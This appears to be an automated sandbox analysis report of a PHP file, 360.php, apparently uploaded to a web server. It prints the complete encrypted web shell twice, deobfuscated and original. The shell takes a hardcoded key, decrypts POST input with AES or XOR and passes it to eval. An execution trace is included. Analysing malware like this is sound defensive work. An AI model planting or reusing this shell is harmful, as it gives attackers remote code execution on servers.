PHP Malware Analysis

360.php

md5: 050a8c1dbd653485ef24387285175fe0

Jump to:

Screenshot


Attributes

Encoding

Environment

Execution

Files

Input


Deobfuscated PHP code

<?php

@error_reporting(0);
session_start();
$key = "e45e329feb5d925b";
$_SESSION['k'] = $key;
session_write_close();
$post = file_get_contents("php://input");
if (!extension_loaded('openssl')) {
    $t = "base64_decode";
    $post = base64_decode($post . "");
    for ($i = 0; $i < strlen($post); $i++) {
        $post[$i] ^= $key[$i + 1 & 15];
    }
} else {
    $post = openssl_decrypt($post, "AES128", $key);
}
$arr = explode('|', $post);
$func = $arr[0];
$params = $arr[1];
class C
{
    public function __invoke($p)
    {
        eval($p . "");
    }
}
@call_user_func(new C(), $params);

Execution traces

data/traces/050a8c1dbd653485ef24387285175fe0_trace-1676241627.4161.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:40:53.313890]
1	0	1	0.000163	393512
1	3	0	0.000256	400136	{main}	1		/var/www/html/uploads/360.php	0	0
2	4	0	0.000274	400136	error_reporting	0		/var/www/html/uploads/360.php	2	1	0
2	4	1	0.000289	400176
2	4	R			0
2	5	0	0.000303	400136	session_start	0		/var/www/html/uploads/360.php	3	0
2	5	1	0.000357	400888
2	5	R			TRUE
1		A						/var/www/html/uploads/360.php	4	$key = 'e45e329feb5d925b'
1		A						/var/www/html/uploads/360.php	5	_SESSION['k'] = 'e45e329feb5d925b'
2	6	0	0.000401	401208	session_write_close	0		/var/www/html/uploads/360.php	6	0
2	6	1	0.000425	401104
2	6	R			TRUE
2	7	0	0.000439	401104	file_get_contents	0		/var/www/html/uploads/360.php	7	1	'php://input'
2	7	1	0.000459	401840
2	7	R			''
1		A						/var/www/html/uploads/360.php	7	$post = ''
2	8	0	0.000483	401800	extension_loaded	0		/var/www/html/uploads/360.php	8	1	'openssl'
2	8	1	0.000497	401840
2	8	R			TRUE
2	9	0	0.000510	401800	openssl_decrypt	0		/var/www/html/uploads/360.php	19	3	''	'AES128'	'e45e329feb5d925b'
2	9	1	0.000541	401904
2	9	R			FALSE
1		A						/var/www/html/uploads/360.php	19	$post = FALSE
2	10	0	0.000565	401800	explode	0		/var/www/html/uploads/360.php	21	2	'|'	FALSE
2	10	1	0.000579	402248
2	10	R			[0 => '']
1		A						/var/www/html/uploads/360.php	21	$arr = [0 => '']
1		A						/var/www/html/uploads/360.php	22	$func = ''
1		A						/var/www/html/uploads/360.php	23	$params = NULL
2	12	0	0.000643	402216	C->__invoke	1		/var/www/html/uploads/360.php	25	1	NULL
2	12	1	0.000658	402248
1	3	1	0.000666	402208
			0.000693	316664
TRACE END   [2023-02-12 20:40:53.314452]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>